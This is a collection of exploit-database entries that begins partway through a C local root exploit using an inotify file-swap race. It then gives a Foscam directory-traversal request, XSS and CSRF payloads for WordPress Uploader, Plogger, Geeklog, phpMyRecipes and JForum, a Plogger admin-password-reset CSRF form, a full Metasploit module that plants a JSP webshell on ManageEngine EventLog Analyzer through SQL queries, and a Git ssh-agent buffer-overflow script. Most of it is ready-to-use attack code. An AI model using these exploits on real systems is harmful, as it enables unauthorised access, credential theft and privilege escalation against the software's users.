sprintf(targetpath, "/tmp/%s", argv[1]);
sprintf(cmd,"/usr/bin/touch %s",targetpath);
printf("[+] Creating target file (%s)\n",cmd);
system(cmd);
printf("[+] Initialize inotify on %s\n",targetpath);
fd = inotify_init();
wd = inotify_add_watch(fd, targetpath, IN_MODIFY);
printf("[+] Waiting for root to modify :\"%s\"\n", argv[1]);
syscall(SYS_read, fd, buf, 1);
syscall(SYS_rename, targetpath, trash);
syscall(SYS_rename, evilsh, targetpath);
inotify_rm_watch(fd, wd);
printf("[+] Opening root shell (/tmp/sh)\n");
sleep(2);
system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
return 0;
}
source: https://www.securityfocus.com/bid/58290/info
Foscam is prone to a directory-traversal vulnerability.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks.
GET //../proc/kcore HTTP/1.0
source: https://www.securityfocus.com/bid/58285/info
The Uploader Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Uploader 1.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E
source: https://www.securityfocus.com/bid/58271/info
Plogger is prone to following input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data:
1. An SQL-injection vulnerability
2. Multiple cross-site scripting vulnerabilities
3. A cross-site request forgery vulnerability
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in context of the affected site, steal cookie-based authentication credentials, access or modify data, exploit latent vulnerabilities in the underlying database, and perform certain unauthorized actions; other attacks are also possible.
Plogger 1.0 Rc1 is vulnerable; other versions may also be affected.
+---+[ Feedback.php Sqli ]+---+
Injectable On entries_per_pag Parameter In Feedback.php
http://www.example.com/plogger/plog-admin/plog-feedback.php?entries_per_page=5'
p0c
if (isset($_REQUEST['entries_per_page'])) {
$_SESSION['entries_per_page'] = $_REQUEST['entries_per_page'];
} else if (!isset($_SESSION['entries_per_page'])) {
$_SESSION['entries_per_page'] = 20;
}
.
.
.
$limit = "LIMIT ".$first_item.", ".$_SESSION['entries_per_page'];
.
.
// Generate javascript init function for ajax editing
$query = "SELECT *, UNIX_TIMESTAMP(`date`) AS `date` from ".PLOGGER_TABLE_PREFIX."comments WHERE `approved` = ".$approved." ORDER BY `id` DESC ".$limit;
$result = run_query($query);
+---+[ CSRF In Admin Panel ]+---+
Plogger is Not using any parameter or security Token to Protect Against CSRF , So its Vuln To CSRF on ALl Locations Inside Admin Panel..
+---+[ XSS ]+---+
Their Are Multiple XSS in Plogger.Like Editing Comment inside Admin Panel.They Are Filtering The Comments For Normal User But Not For Admin.
And AS it is CSRF All Where SO We Can Edit AN Comment VIA CSRF and Change it With Any XSS Vector..
XSS
http://www.example.com/plogger/plog-admin/plog-feedback.php
Edit Comment With ANy XSS Vector OR JUSt do it VIA CSRF.
Uploading the File and enter name to any XSS Vector..
http://www.example.com/plogger/plog-admin/plog-upload.php
It Can Me Exploit IN Many Ways LIke
CSRF + SQLI inside Admin panel..which Is define above.
XSS In Edit Comment.CSRF + XSS
<html>
<head>
<form class="edit width-700" action="www.example.com/plogger/plog-admin/plog-feedback.php" method="post">
<div style="float: right;"><img src="http://www.example.com/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Comment</div>
<p>
<label class="strong" accesskey="a" for="author">Author:</label><br />
<input size="65" name="author" id="author" value="<script>alert('Hi');</script>" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="e" for="email">Email:</label><br />
<input size="65" name="email" id="email" value="asdf@www.example.com.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="u" for="url">Website:</label><br />
<input size="65" name="url" id="url" value="http://adsf.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="c" for="comment">Comment:</label><br />
<textarea cols="62" rows="4" name="comment" id="comment"><script>alert('Hi');</script></textarea>
</p>
<input type="hidden" name="pid" value="4" />
<input type="hidden" name="action" value="update-comment" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>
Another XSS
http://www.example.com/plogger/plog-admin/plog-manage.php?action=edit-picture&id=1
Edit Caption To XSS Vector Inside Admin PAnel..
Again CSRF + XSS
<form class="edit width-700" action="www.example.com/plogger/plog-admin/plog-manage.php?level=pictures&id=1" method="post">
<div style="float: right;"><img src="http://www.example.com/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Image Properties</div>
<p>
<label class="strong" accesskey="c" for="caption"><em>C</em>aption:</label><br />
<input size="62" name="caption" id="caption" value="<script>alert(document.cookie);</script>" type="hidden"/>
</p>
<p>
<label class="strong" for="description">Description:</label><br />
<textarea name="description" id="description" cols="60" rows="5"><script>alert(document.cookie);</script></textarea>
</p>
<p><input type="checkbox" id="allow_comments" name="allow_comments" value="1" checked="checked" /><label class="strong" for="allow_comments" accesskey="w">Allo<em>w</em> Comments?</label></p>
<input type="hidden" name="pid" value="1" />
<input type="hidden" name="action" value="update-picture" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>
CSRF Admin Password Reset And XSS
plog-options.php
<form action="http://www.example.com/plogger/plog-admin/plog-options.php" method="post">
<table class="option-table" cellspacing="0">
<tbody><tr class="alt">
<td class="left"><label for="admin_username"></label></td>
<td class="right"><input size="40" id="admin_username" name="admin_username" value="admin" type="hidden"></td>
</tr>
<tr>
<td class="left"><label for="admin_email"></label></td>
<td class="right"><input size="40" id="admin_email" name="admin_email" value="www.example.com@hotmail.com" type="hidden"></td>
</tr>
<tr class="alt">
<td class="left"><label for="admin_password"></label></td>
<td class="right"><input size="40" id="admin_password" name="admin_password" value="123456789" type="hidden"></td>
<tr>
<td class="left"><label for="confirm_admin_password"></label></td>
<td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="123456789" type="hidden"></td>
</tr>
<td class="left"><label for="gallery_url"></label></td>
<td class="right"><input size="40" type="text" id="gallery_url" name="gallery_url" value="<script>alert('hi');</script>" type="hidden"/></td></tr>
</tbody></table>
<td class="right"><input class="submit" name="submit" value="DOne" type="submit"></td>
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'ManageEngine EventLog Analyzer Remote Code Execution',
'Description' => %q{
This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6
build 10060 and previous versions. Every authenticated user, including the default "guest"
account can execute SQL queries directly on the underlying Postgres database server. The
queries are executed as the "postgres" user which has full privileges and thus is able to
write files to disk. This way a JSP payload can be uploaded and executed with SYSTEM
privileges on the web server. This module has been tested successfully on ManageEngine
EventLog Analyzer 10.0 (build 10003) over Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
],
'References' =>
[
['EDB', '38173']
],
'Platform' => ['win'],
'Arch' => ARCH_X86,
'Targets' =>
[
['ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1', {}]
],
'Privileged' => true,
'DisclosureDate' => 'Jul 11 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8400),
OptString.new('USERNAME', [ true, 'The username to authenticate as', 'guest' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate as', 'guest' ])
], self.class)
end
def uri
target_uri.path
end
def check
# Check version
vprint_status("#{peer} - Trying to detect ManageEngine EventLog Analyzer")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'event', 'index3.do')
})
if res && res.code == 200 && res.body && res.body.include?('ManageEngine EventLog Analyzer')
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def sql_query(cookies, query)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'event', 'runQuery.do'),
'cookie' => cookies,
'vars_post' => {
'execute' => 'true',
'query' => query,
}
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Failed executing SQL query!")
end
res
end
def generate_jsp_payload(cmd)
decoder = rand_text_alpha(4 + rand(32 - 4))
decoded_bytes = rand_text_alpha(4 + rand(32 - 4))
cmd_array = rand_text_alpha(4 + rand(32 - 4))
jsp_code = '<%'
jsp_code << "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
jsp_code << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"
jsp_code << "String [] #{cmd_array} = new String[3];\n"
jsp_code << "#{cmd_array}[0] = \"cmd.exe\";\n"
jsp_code << "#{cmd_array}[1] = \"/c\";\n"
jsp_code << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
jsp_code << "Runtime.getRuntime().exec(#{cmd_array});\n"
jsp_code << '%>'
jsp_code
end
def exploit
print_status("#{peer} - Retrieving JSESSION ID")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'event', 'index3.do'),
})
if res && res.code == 200 && res.get_cookies =~ /JSESSIONID=(\w+);/
jsessionid = $1
print_status("#{peer} - JSESSION ID Retrieved [ #{jsessionid} ]")
else
fail_with(Failure::Unknown, "#{peer} - Unable to retrieve JSESSION ID!")
end
print_status("#{peer} - Access login page")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'event', "j_security_check;jsessionid=#{jsessionid}"),
'vars_post' => {
'forChecking' => 'null',
'j_username' => datastore['USERNAME'],
'j_password' => datastore['PASSWORD'],
'domains' => "Local Authentication\r\n",
'loginButton' => 'Login',
'optionValue' => 'hide'
}
})
if res && res.code == 302
redirect = URI(res.headers['Location'])
print_status("#{peer} - Location is [ #{redirect} ]")
else
fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
end
# Follow redirection process
print_status("#{peer} - Following redirection")
res = send_request_cgi({
'uri' => "#{redirect}",
'method' => 'GET'
})
if res && res.code == 200 && res.get_cookies =~ /JSESSIONID/
cookies = res.get_cookies
print_status("#{peer} - Logged in, new cookies retrieved [#{cookies}]")
else
fail_with(Failure::Unknown, "#{peer} - Redirect failed, unable to login with provided credentials!")
end
jsp_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.jsp'
cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
jsp_payload = Rex::Text.encode_base64(generate_jsp_payload(cmd)).gsub(/\n/, '')
print_status("#{peer} - Executing SQL queries")
# Remove large object in database, just in case it exists from previous exploit attempts
sql = 'SELECT lo_unlink(-1)'
result = sql_query(cookies, sql)
# Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.
sql = 'SELECT lo_create(-1)'
result = sql_query(cookies, sql)
if result.body =~ /menuItemRow\">([0-9]+)/
loid = $1
else
fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
end
select_random = rand_text_numeric(2 + rand(6 - 2))
# Insert JSP payload into the pg_largeobject table. We have to use "SELECT" first to to bypass OpManager's checks for queries starting with INSERT/UPDATE/DELETE, etc.
sql = "SELECT #{select_random};INSERT INTO/**/pg_largeobject/**/(loid,pageno,data)/**/VALUES(#{loid}, 0, DECODE('#{jsp_payload}', 'base64'));--"
result = sql_query(cookies, sql)
# Export our large object id data into a WAR file
sql = "SELECT lo_export(#{loid}, '..//..//webapps//event/#{jsp_name}');"
sql_query(cookies, sql)
# Remove our large object in the database
sql = 'SELECT lo_unlink(-1)'
result = sql_query(cookies, sql)
register_file_for_cleanup("..\\webapps\\event\\#{jsp_name}")
print_status("#{peer} - Executing JSP payload")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, jsp_name),
})
# If the server returns 200 we assume we uploaded and executed the payload file successfully
unless res && res.code == 200
print_status("#{res.code}\n#{res.body}")
fail_with(Failure::Unknown, "#{peer} - Payload not executed, aborting!")
end
end
end
Source: http://www.halfdog.net/Security/2015/ApportKernelCrashdumpFileAccessVulnerabilities/
Problem description: On Ubuntu Vivid Linux distribution apport is used for automated sending of client program crash dumps but also of kernel crash dumps. For kernel crashes, upstart or SysV init invokes the program /usr/share/apport/kernel_crashdump at boot to prepare crash dump files for sending. This action is performed with root privileges. As the crash dump directory /var/crash/ is world writable and kernel_crashdump performs file access in unsafe manner, any local user may trigger a denial of service or escalate to root privileges. If symlink and hardlink protection is enabled (which should be the default for any modern system), only denial of service is possible.
Problematic syscall in kernel_crashdump is:
open("/var/crash/linux-image-3.19.0-18-generic.0.crash", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE|O_CLOEXEC, 0666) = 30
...
open("/var/crash/vmcore.log", O_RDONLY|O_LARGEFILE|O_CLOEXEC) = 31
Thus the output file is opened unconditionally and without O_EXCL or O_NOFOLLOW. Also opening of input file does not care about links.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38353.zip
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt
Vendor:
================================
git-scm.com
Product:
================================
Git-1.9.5-preview20150319.exe
github.com/msysgit/msysgit/releases/tag/Git-1.9.5-preview20150319
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=========================
Git Windows SVN ssh-agent.exe is vulnerable to buffer overflow. Under cmd dir in Git there is
start-ssh-agent.cmd file used to invoke ssh-agent.exe. This is local attack vector in which if
the "start-ssh-agent.cmd" file is replaced with specially crafted malicious '.cmd' file we cause buffer overflow, code execution may become possible.
Fault module seems to be msys-1.0.dll
File Name: msys-1.0.dll
MD5: 39E779952FF35D1EB3F74B9C36739092
APIVersion: 0.46
Stack trace:
-------------
MSYS-1.0.12 Build:2012-07-05 14:56
Exception: STATUS_ACCESS_VIOLATION at eip=41414141
eax=FFFFFFFF ebx=0028FA3C ecx=680A4C3A edx=680A4C3A esi=0028FA2C edi=00001DAC
ebp=42424242 esp=0028F9B4 program=C:\Program Files (x86)\Git\bin\ssh-agent.exe
cs=0023 ds=002B es=002B fs=0053 gs=002B ss=002B
Payload of 944 bytes to cause seg fault:
@ 948 bytes we completely overwrite EBP register.
@ 972 bytes KABOOOOOOOOOOM! we control EIP.
Quick GDB dump...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax 0xffffffff -1
ecx 0x680a4c3a 1745505338
edx 0x680a4c3a 1745505338
ebx 0x28f90c 2685196
esp 0x28f884 0x28f884
ebp 0x41414141 0x41414141
esi 0x28f8fc 2685180
edi 0x2660 9824
eip 0x41414141 0x41414141
eflags 0x10246 [ PF ZF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x53 83
gs 0x2b 43
POC code(s):
===============
Python script below to create a malicious 'start-ssh-agent.cmd' file that will be renamed
to 'ssh_agent_hell.cmd' and moved to the Git/bin directory, once run will cause buffer overflow and overwrite EIP.
Save following as ssh-agent-eip.py or whatever, run the script to generate a new malicious '.cmd' file and run it!
'''
import struct,os,shutil
#Git ssh-agent.exe
#EIP overwrite at 972 bytes
#By hyp3rlinx
#======================================================
file="C:\\Program Files (x86)\\Git\\bin\\ssh_agent_hell"
payload="CALL ssh-agent.exe "
x=open(file,"w")
eip="A"*4
payload+="B"*968+eip
x.write(payload)
x.close()
src="C:\\Program Files (x86)\\Git\\bin\\"
shutil.move(file,file+".cmd")
print "Git ssh-agent.exe buffer overflow POC\n"
print "ssh_agent_hell.cmd file created!...\n"
print "by hyp3rlinx"
print "====================================\n"
'''
Disclosure Timeline:
=========================================================
Vendor Notification: August 10, 2015
Sept 26, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local
Description:
==========================================================
Vulnerable Product: [+] Git-1.9.5-preview20150319.exe
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
by hyp3rlinx
'''
source: https://www.securityfocus.com/bid/58209/info
Geeklog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Geeklog 1.8.2 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/submit.php?type=calendar" method="post">
<input type="hidden" name="mode" value="Submit">
<input type="hidden" name="calendar_type" value='"><script>alert(document.cookie);</script>'>
<input type="submit" id="btn">
</form>
source: https://www.securityfocus.com/bid/58160/info
phpMyRecipes is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks may also be possible.
phpMyRecipes 1.2.2 is vulnerable; other versions may also be affected.
POST /recipes/addrecipe.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
r_name="><script>alert(0)</script>&r_category=13&r_servings=1&r_difficulty=1&i_qty=&i_unit=4&i_item=0&i_item_text=&r_instructions="><script>alert(0)</script>
source: https://www.securityfocus.com/bid/58164/info
JForum is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
JForum 2.1.9 is vulnerable; other versions may also be affected.
GET/jforum/jforum.page?module=posts&start=0&forum_id=1&quick=1&disable_html=1&action=insertSave4a9d0%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e5d668e3a93160a27e&topic_id=2 HTTP/1.1